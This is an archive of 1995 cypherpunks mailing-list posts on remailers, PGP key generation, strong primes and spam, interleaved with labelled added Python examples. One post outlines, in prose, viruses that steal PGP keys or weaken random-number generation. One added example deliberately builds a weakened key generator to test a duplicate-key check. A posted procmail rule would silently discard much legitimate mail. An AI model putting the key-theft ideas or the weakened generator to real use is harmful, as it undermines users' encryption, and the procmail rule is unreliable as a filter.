From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 20 Nov 1995 23:12:12 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511201450.GAA11841@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix pgp. hash latent cut ek reorder";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ecafe    cpunk@remail.ecafe.org           --*+* *+* .-  3:47:29  99.20%
robo     robo@c2.org                      #** *##+  ##     1:57  99.04%
hacktic  remailer@utopia.hacktic.nl       *** ***+* **     9:23  98.98%
spook    remailer@valhalla.phoenix.net    ++* ** +* **    19:50  98.83%
wmono    wmono@valhalla.phoenix.net       ++* ***+*  *    12:53  98.69%
rmadillo remailer@armadillo.com           ++++++ ++ ++    36:16  98.69%
hroller  hroller@c2.org                        ##+  ##      :51  98.68%
mix      mixmaster@remail.obscura.com     ----+-+ + -   1:13:12  98.54%
flame    remailer@flame.alias.net         ***  * +*  *    17:08  98.26%
replay   remailer@replay.com              ++*       **     7:26  98.05%
portal   hfinney@shell.portal.com         *      +* ##     3:56  97.99%
vishnu   mixmaster@vishnu.alias.net        **+**  +  *    16:08  97.79%
bsu-cs   nowhere@bsu-cs.bsu.edu           #** *#-+*  #     3:17  97.03%
ideath   remailer@ideath.goldenbear.com   ------- -  -  6:03:13  95.95%
penet    anon@anon.penet.fi               -----..- -   11:16:54  95.74%
alumni   hal@alumni.caltech.edu           *+* +  ++  #     5:01  95.02%
ford     remailer@bi-node.zerberus.de     _ _-.-+ +++  17:34:27  92.75%
extropia remail@extropia.wimsey.com       -..-- -----   5:46:08  92.40%
c2       remail@c2.org                    +++  +  + +     53:15  91.60%
rahul    homer@rahul.net                  -**+*#++* *      8:22  97.99%
syrinx   syrinx@c2.org                    +-  ++        5:13:50  28.61%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
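
An added example (not premail's code and not part of Raph's listing): a parser for the three parts of the listing above, used to pick a chain in which no two hops share a machine or operator. The function names, the 95% uptime floor and the selection rule are assumptions of the example; the sample rows are a subset copied from the listing.

```python
import re

# Subset of the listing above: capability lines, operator groups, uptime rows.
LISTING = r'''
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)
robo     robo@c2.org                      #** *##+  ##     1:57  99.04%
hacktic  remailer@utopia.hacktic.nl       *** ***+* **     9:23  98.98%
spook    remailer@valhalla.phoenix.net    ++* ** +* **    19:50  98.83%
flame    remailer@flame.alias.net         ***  * +*  *    17:08  98.26%
replay   remailer@replay.com              ++*       **     7:26  98.05%
portal   hfinney@shell.portal.com         *      +* ##     3:56  97.99%
alumni   hal@alumni.caltech.edu           *+* +  ++  #     5:01  95.02%
c2       remail@c2.org                    +++  +  + +     53:15  91.60%
rahul    homer@rahul.net                  -**+*#++* *      8:22  97.99%
syrinx   syrinx@c2.org                    +-  ++        5:13:50  28.61%
'''

ENTRY = re.compile(r'\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";')
GROUP = re.compile(r'^\(([^)]+)\)$')
STATS = re.compile(r'^(\S+)\s+(\S+@\S+)\s.*\s(\d+\.\d+)%$')


def parse_listing(text):
    """Return ({name: info}, [set_of_names_sharing_an_operator, ...])."""
    remailers, groups = {}, []
    for line in text.splitlines():
        line = line.strip()
        if m := ENTRY.match(line):
            name, addr, flags = m.group(1), m.group(2), m.group(3).split()
            # "pgp." (with a period) means the short name is the PGP key ID;
            # plain "pgp" means the full e-mail address is.
            key_id = name if "pgp." in flags else addr if "pgp" in flags else None
            remailers[name] = {
                "address": addr,
                "flags": {f.rstrip(".") for f in flags},
                "key_id": key_id,
                "uptime": None,
            }
        elif m := GROUP.match(line):
            groups.append(set(m.group(1).split()))
        elif m := STATS.match(line):
            if m.group(1) in remailers:
                remailers[m.group(1)]["uptime"] = float(m.group(3))
    return remailers, groups


def pick_chain(remailers, groups, length, require=("cpunk", "pgp"),
               avoid=("mon", "filter"), min_uptime=95.0):
    """Pick `length` remailers, highest uptime first, at most one per operator."""
    def operator_of(name):
        for index, members in enumerate(groups):
            if name in members:
                return index
        return name  # not in any group: treated as its own operator

    ranked = sorted(
        (n for n, r in remailers.items()
         if set(require) <= r["flags"]
         and not set(avoid) & r["flags"]
         and r["uptime"] is not None and r["uptime"] >= min_uptime),
        key=lambda n: -remailers[n]["uptime"],
    )
    chain, used = [], set()
    for name in ranked:
        operator = operator_of(name)
        if operator in used:
            continue  # a second hop at the same operator adds no protection
        chain.append(name)
        used.add(operator)
        if len(chain) == length:
            return chain
    raise ValueError("not enough independent remailers for this chain length")


if __name__ == "__main__":
    table, shared = parse_listing(LISTING)
    for hop in pick_chain(table, shared, 3):
        print(hop, table[hop]["address"], "key ID:", table[hop]["key_id"])
```
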




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 20 Nov 1995 23:51:31 +0800
To: Derek Atkins <klp@gold.tc.umn.edu>
Subject: Re: Good Enough?
Message-ID: <acd6488c0102100451b8@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 1:24 PM 11/14/95, Derek Atkins wrote:
>Hi.
>
>First, I must warn you that generating keys on behalf of users is in
>general a very bad thing to do.  Instead, you might want to provide a
>simple way for users to generate keys and get them certified.  The
>biggest problem is that there is not an easy way to get a good set of
>random numbers on a server platform.  On the other hand, users can get
>a great deal of randomness on their own client machines.  If they can
>run netscape, then they can run PGP.
....
I don't like to harp on this but you have stated the scenario so clearly,
that I ask:

If  the user cannot trust you to generate keys for him, why should
he trust the code that you provide to him? That code can have
errors like the old Netscape code except planted on purpose so
that the private key is guessable in 2^40 tries.

There are two answers, I think.
   The code is public and the user
   hopes that any flaws will be publicized.

The second is to use keyed information (not timing but character
information) to provide the random seed. That is the idea behind
my post a few weeks ago:
"Using deterministic programs to select private RSA keys"
Some may find that method less hazardous than trusting the culture
of publishing flaws in code.

I can forward that posting to anyone interested.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 20 Nov 1995 06:59:47 +0800
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951116091316.19868C-100000@eagle.nexor.co.uk>
Message-ID: <Pine.SOL.3.91.951117123337.27369A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Andy Brown wrote:
> > Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
> > (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.
> As a matter of interest, how long did it take you to generate this, and
> with what hardware?  I left a 120Mhz Pentium searching for 15 hours
> overnight without any success (it managed to eliminate 10 candidate primes
> as not strong in that time). 

Well, I left it running for about 50 hours over last weekend without a hit. 
Then I restarted it on Monday night and got a hit in about 12 hours :-).
(I thought it had finished sooner but I looked again at the 'script(1)'
output and it did take 12 hours).
It is sort of hard to tell how long things would take, due to the hit or
miss nature of this kind of search for primes. This is on a SGI with a
200mhz R4400 which is about the same speed as a 120mhz pentium when using
my maths libraries.

I'm doing the 'pick' an odd random number 'p', sieve p and (p-1)/2 over
the first 2000 primes, adding in steps until a number passes the sieve.
For a generator of 2, p mod 24 == 11 should be true.

When it passes, then do Miller-Rabin tests on P and (P-1)/2 enough times
to be happy that the number is probably a prime :-). 

I believe that there are improvements that I can put in there for the
initial search for candidate primes.

The actual numbers for the search are as follows,
1057 numbers passed the 'strong prime sieve'. 
7 numbers passed the prime test 
1 number passed both the prime and strong prime test. 

I suspect the ratio of 132 candidates for 'strong' prime testing for each
'prime' could be brought down quite a bit but since I only need strong
primes for DH parameters, I probably will not spend the time on improving
my initial sieve right now. 

eric

PS, I just 'found' another 2048 bit strong prime last Friday night,
2929 numbers passed the 'strong prime sieve'.
29 numbers passed the prime test (101 candidates per hit)
1 number passed both the prime and strong prime test,
4h12m run time.
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
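
The search described in the message above (candidates with p mod 24 == 11, a sieve of p and (p-1)/2 over the first 2000 primes while stepping, then Miller-Rabin on both numbers), written out in Python. This is an added example, not Eric's code or his maths library; the function names, the use of the secrets module and the 20 Miller-Rabin rounds are assumptions made here.

```python
import secrets


def small_primes(count):
    """Return the first `count` primes (sieve of Eratosthenes, grown as needed)."""
    limit = 64
    while True:
        sieve = bytearray([1]) * (limit + 1)
        sieve[0] = sieve[1] = 0
        for i in range(2, int(limit ** 0.5) + 1):
            if sieve[i]:
                sieve[i * i :: i] = bytes(len(sieve[i * i :: i]))
        primes = [i for i, flag in enumerate(sieve) if flag]
        if len(primes) >= count:
            return primes[:count]
        limit *= 2


def is_probable_prime(n, rounds=20):
    """Miller-Rabin with random bases; False means n is certainly composite."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2          # base in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False                          # a is a witness: composite
    return True


def find_strong_prime(bits, rounds=20, sieve_count=2000):
    """Find p with p and (p-1)/2 both prime and p mod 24 == 11.

    Returns (p, stats). stats counts candidates that passed the sieve and
    those for which p itself passed Miller-Rabin, like the counts in the post.
    """
    if bits < 32:
        raise ValueError("bits must be >= 32 so candidates exceed the sieve primes")
    # 2 and 3 are already handled by p mod 24 == 11 (p odd, (p-1)/2 odd,
    # neither divisible by 3), so the sieve starts at 5.
    odd_primes = [r for r in small_primes(sieve_count) if r > 3]
    stats = {"sieve_passed": 0, "p_prime": 0}
    while True:
        p = secrets.randbits(bits) | (1 << (bits - 1))   # force the top bit
        p += (11 - p) % 24                               # move up to 11 mod 24
        residues = [p % r for r in odd_primes]
        while p.bit_length() == bits:
            # residue 0: r divides p.  residue 1: r divides p-1, hence (p-1)/2.
            if all(x > 1 for x in residues):
                stats["sieve_passed"] += 1
                if is_probable_prime(p, rounds):
                    stats["p_prime"] += 1
                    if is_probable_prime((p - 1) // 2, rounds):
                        return p, stats
            p += 24                                      # keeps p mod 24 == 11
            residues = [(x + 24) % r for x, r in zip(residues, odd_primes)]


if __name__ == "__main__":
    p, stats = find_strong_prime(256)
    q = (p - 1) // 2
    print(hex(p))
    print(stats)
    # With p mod 24 == 11, 2 is a quadratic non-residue, so 2^q == -1 mod p
    # and 2 generates the whole multiplicative group.
    print("2 is a generator:", pow(2, q, p) == p - 1)
```

The work grows quickly with size: the share of candidates that survive both primality tests falls roughly with the square of the bit length, which is why the 4096-bit search in the post ran for hours.
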






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Tue, 21 Nov 1995 01:44:38 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <9511201710.AA25590@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:47 PM 11/19/95 -0500, you wrote:
>
>  Is anyone else getting lots of junk e-mail lately? I'm getting all
>kinds of direct marketing crap to both of my main accounts and I haven't
>posted to usenet in months. 

   On a related note, Compuserve had a note on their system last week from
the sysop.  Their customers are receiving unwanted e-mail advertisements
from the Internet.  Compuserve sysops are attempting to block the spamming
but are finding it difficult because the advertiser is coming in via
different routes.  They are also attempting to stop them using the court
system.  

   The advertiser, according to the Compuserve sysop, threatened a
mail-bombing if Compuserve tried to block them!!!  This would be a just
cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
response". 

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Nov 1995 10:35:53 +0800
To: cypherpunks@toad.com
Subject: HOR_mel
Message-ID: <199511201509.KAA03155@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-20-95. Washrag:


   "It's the Spam You Read That's Making Many Interneters
   Queasy."

      It's squarely at odds with Internet culture. And an on-
      line mass mailer is drafting a lawsuit against a
      spammer, advised by Stewart A. Baker, former general
      counsel to the NSA. Having taken plenty of flak on the
      Internet for defending a Clinton administration proposal
      on encryption, Baker is pleased to be working on an
      issue so dear to the heart of the 'Net community. "It's
      not every day that you come to the office humming a
      tune," Baker said. "But working on this case, I do."


   11-20-95. W$Joker:

   "Why Many Businesses Can't Keep Their Secrets."

      Personal computers are the biggest contributors to the
      security headaches of companies. "Computer technology
      has enhanced the control and power of the individual
      employee to a level that transcends what was customary
      in the traditional workplace." Many experts see a
      correlation between recent leaks and the decline in
      workers' loyalty to employers, falling job security and
      increased workloads. The media have played a part as
      well by becoming more aggressive over the past three
      decades about challenging institutions and exposing
      scandal. This makes it "more possible for an employee to
      have his 15 minutes of fame" by waving his boss's
      victorias.

      Just what suffices legally as a reasonable precaution in
      a frontier developing as rapidly as computer technology
      isn't clear yet. For instance, requiring passwords for
      access to a computer system, once considered a
      reasonable precaution, now isn't enough. That's why
      consultants are recommending periodic internal audits to
      test for computer-system penetration and compliance with
      documented security policies.


   2: HOR_mel  (14 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 20 Nov 1995 23:30:22 +0800
To: cypherpunks@toad.com
Subject: [noise] country domains
In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511201055.A43418-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 20 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> I think the University of Calgary is actually in the .ca domain. 
> 
> It's a Canadian address.  It's just like your very own domain.  Your
> machine tesla is on uottawa.ca.  Your University of Ottawa address is not
> in .edu, but is in .ca. 

True, but as the folks with the export-controlled ftp sites can tell you, you
can pretty much register as anything. Eg. U of Toronto has .edu addresses 
and .ca's , some of my friends around here have .net addresses, and I 
assume anyone anywhere in the world can probably get something like, 
.com, .net, .org (.edu's strictly controlled, isn't it?). (I even
know someone in Montreal whose company machine is in .se since he works
for Ericson (sp?) or somesuch Scandinavian company).

Which is another spit in ITAR's face, or which meant that Tim wasn't 
able to get PGPfone from MIT (the prog couldn't figure out if his .net
address was in the US) and had to get it off an illegal usenet post.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Danny Cox <dannyc@gmap.leeds.ac.uk>
Date: Mon, 20 Nov 1995 19:31:57 +0800
To: cypherpunks@toad.com
Subject: Re: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY
Message-ID: <10778.9511201052@gmap.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Piete,

  I read various bits about using the MBone for conferences etc including
this one, and I'd like to be able to listen to them.  Can you point me to
any tools which I can use to access it and give me some pointers as to how
to use them ?

  Thanks,
Danny Cox




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Tue, 21 Nov 1995 01:41:31 +0800
To: cypherpunks@toad.com
Subject: Re: remailer abuse
In-Reply-To: <199511200524.VAA00445@netscape.com>
Message-ID: <199511201708.LAA17184@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Corey Bridges <corey@netscape.com> said:

CB> If junk mail continues to bother people, it's only a matter of time
CB> until mail programs' filtering capabilities become much more
CB> sophisticated. (Of course, for all I know, there already ARE
CB> programs that do what I'm about to propose.) People can maintain a
CB> "do not accept from" list, containing every anonymous remailer
CB> they've ever heard about, or an "accept only from" list, containing
CB> just the people they wish to converse with.

	Well, it might not be luser-friendly, but procmail does that:

:0
* (^From|^Sender|^TO).*(junk|mail|list)
/dev/null

:0
* (^From|^Sender|^TO).*(send|me|mail|list)
wanted.mail

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 21 Nov 1995 04:15:25 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk Email"
Message-ID: <Pine.ULT.3.91.951120112600.17877G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


See http://www.valleynet.net/hypermail/html/

Hurry, they might turn it off.

ROTFL

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 21 Nov 1995 04:09:53 +0800
To: cypherpunks@toad.com
Subject: Virus attacks on PGP
Message-ID: <199511201945.LAA27486@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PGP can be vulnerable to virus attacks.  (Similar attacks can be made on
other cipher systems.) These virus attacks can either be "Get the Key", or
"Subvert the System" attacks.  Schneier's "Rubber Hose" attack and a class
of attack which I will call "Black Bag" attacks are get the key attacks. 
With a black bag attack, victims do not know their keys have been stolen,
and so continue to use them.  (According to "The Puzzle Palace", NSA got
the FBI to perform black bag attacks on embassies in Washington DC.)  I
don't think subvert the system attacks have any parallel in classical
cryptography.


Get the Key Attacks

PGP has three keys: the secret key ring pass phrase, the secret RSA key,
and the IDEA key.  Getting any of them would constitute a successful
attack.

A virus that collects secret key rings and sends their contents somewhere,
either via UDP like messages or by dialing the modem late at night doesn't
seem too much harder to build than one that erases your hard disk.  If it
runs only once per machine, its chances of getting caught are fairly low. 
The standard IP error handling of "throw away the packet" means that it
probably won't be caught by firewalls.  It seems more likely that someone
will catch their computer making an unauthorized 800 number call.  This
attack would allow an opponent to use a brute force attack on the pass
phrase.

Getting the pass phrase or the IDEA key requires that the virus infect
something in the PGP environment.  The infection could be to PGP itself, or
to the operating system in which it runs.  (N.B. Since Mac and PC systems
have only one protection domain, all programs running in them are part of
the operating system for the sake of this analysis.)

Assuming PGP is infected, although similar arguments apply to the operating
system, the possible mechanisms of infection are many:

  An infected PGP binary is installed
  A virus modifies disk copies of PGP
  The OS's loader is infected to modify PGP as it is loaded
  The compiler or linker is infected to modify PGP.

Any of these forms of infection could send pass phrases, secret keys, or
IDEA keys out via IP or modem.


Subvert the System Attacks

The mechanisms of infection are similar to those of the get the key
attacks, but these attacks do not require that the virus send data outside
the machine.  Instead, these attacks act by reducing the size of one of the
three key spaces, making it vulnerable to brute force attacks.  For
example, if the OS provides a "random number" service, then limiting the
randomness of the numbers constitutes an attack.  Making RSA key generation
loosely connected to the date and time constitutes an attack.


Defenses

One standard defense in classical cryptography is to frequently change the
cipher keys.  The PGP web-of-trust makes changing keys difficult, and is
perhaps the weakest part of the overall protocol.

Standard defenses against viruses can help, but if the attacker is
determined and competent, then the virus will not be detected by virus
detection programs, and will not have bugs which cause noticeable ill
effects on infected machines.

Custom changes to things like random number utilities and the PGP code
itself may increase resistance by preventing some of these attacks from
identifying the modified code as its intended target.

Auditing code, preferably object code, can detect infection.  Having ALL
the source code available is almost a requirement here.

Maintaining a file of cryptographic hashes of the IDEA keys used and
checking for duplicates can detect subvert the system attacks on IDEA key
generation at the risk that the cryptographic hash is in fact invertible
and can be used to reveal the IDEA key.

Using operating systems which run in many small protection domains can
limit the opportunity for infection.  One such system I have been involved
with for over 20 years is described at the following WEB sites:
  http://www.cis.upenn.edu/~KeyKOS/
  http://www.webcom.com/agorics/allkey.html

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA
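
The duplicate check described under "Defenses" in the message above, as an added example that is not part of the original post. To limit the risk the post names, that the stored hash could be used to recover a key, this version stores an HMAC-SHA256 tag computed under a separate secret instead of a bare hash; that choice, the class and function names, and the deliberately weak generator used to exercise the check are all assumptions of the example.

```python
import hashlib
import hmac
import os
import secrets
import tempfile


class SessionKeyLog:
    """Append-only file of keyed digests of session keys already used."""

    def __init__(self, path, tag_key):
        self.path = path
        self.tag_key = tag_key      # secret kept apart from the log file
        self.seen = set()
        if os.path.exists(path):
            with open(path, "r", encoding="ascii") as fh:
                self.seen = {line.strip() for line in fh if line.strip()}

    def _tag(self, session_key):
        # Keyed digest: the log alone cannot be used to test guessed keys.
        return hmac.new(self.tag_key, session_key, hashlib.sha256).hexdigest()

    def record(self, session_key):
        """Log the key's tag; return True if this key has been seen before."""
        tag = self._tag(session_key)
        if tag in self.seen:
            return True
        self.seen.add(tag)
        with open(self.path, "a", encoding="ascii") as fh:
            fh.write(tag + "\n")
        return False


def healthy_keygen():
    """128-bit key (the IDEA key size) from the OS random source."""
    return secrets.token_bytes(16)


def subverted_keygen():
    """Constructed stand-in for a tampered generator: each key looks random,
    but only 4096 distinct keys can ever come out."""
    seed = secrets.randbelow(4096).to_bytes(2, "big")
    return hashlib.sha256(seed).digest()[:16]


def count_duplicates(keygen, draws, log):
    """Generate `draws` keys and count how many the log had already seen."""
    return sum(log.record(keygen()) for _ in range(draws))


def demo(draws=5000):
    """Return (duplicates from healthy generator, duplicates from weak one)."""
    with tempfile.TemporaryDirectory() as tmp:
        tag_key = secrets.token_bytes(32)
        good = SessionKeyLog(os.path.join(tmp, "good.log"), tag_key)
        weak = SessionKeyLog(os.path.join(tmp, "weak.log"), tag_key)
        return (count_duplicates(healthy_keygen, draws, good),
                count_duplicates(subverted_keygen, draws, weak))


if __name__ == "__main__":
    good_dups, weak_dups = demo()
    print("healthy generator duplicates:  ", good_dups)
    print("subverted generator duplicates:", weak_dups)
```

A single repeat from a 128-bit generator is already an alarm. The check only catches a reduced key space once enough keys have been drawn for a collision, so it complements code auditing rather than replacing it.
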






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Tue, 21 Nov 1995 04:45:06 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511202005.MAA25006@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


The other anonymous poster was referring to Detweiler's
belief that cryptoanarchy was a budding Nazism as one
of his apparent motivations. After a little bit of 
amateur Detweiler study I can agree with this. 

His page at http://www.csn.net/~ldetweil/ has sections that
emphasize his concern about cryptoanarchy as a kind of
"neo-nazism". Thankfully the cryptoanarchist sentiments
on this list are much different than nazism in the way
it advocates complete disengagement from the political
process, something that tended to make the Nazist agenda
highly dangerous. Without that you just have a bunch of
subversive guerillas. Like gnats, irritating but irrelevant.

So as long as we stick with the non-political advocation,
and stay disorganized, and don't ever amount to anything
significant as far as visible political clout, I think
Detweiler is generally going to continue to leave us alone,
thank God.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Date: Tue, 21 Nov 1995 01:45:20 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: WRITTEN CODE
In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.951120121240.18418A-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 20 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> On Sat, 18 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:
> 
> > Curious, where is uncg.edu? Your French name doesn't make me think you're 
> > in the States (as an .edu address might suggest, but then not necessarily 
> > either). (univ of Calgary?)                                           

    uncg.edu is in North Carolina.  uncg stands for University of North
    Carolina at Greensboro.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 1995 03:13:03 +0800
To: Chris Claborne <Chris.Claborne@sandiegoca.attgis.com>
Subject: Re: "Junk E-Mail"
In-Reply-To: <9511201710.AA25590@toad.com>
Message-ID: <9511201851.AA28000@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>   The advertiser, according to the Compuserve sysop, threatened a
>mail-bombing if Compuserve tried to block them!!!  This would be a just
>cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
>response". 

I think it would be better to slap a RICO suit onto the company concerned.
It sounds to me like an attempt to gain financial advantage through threatening 
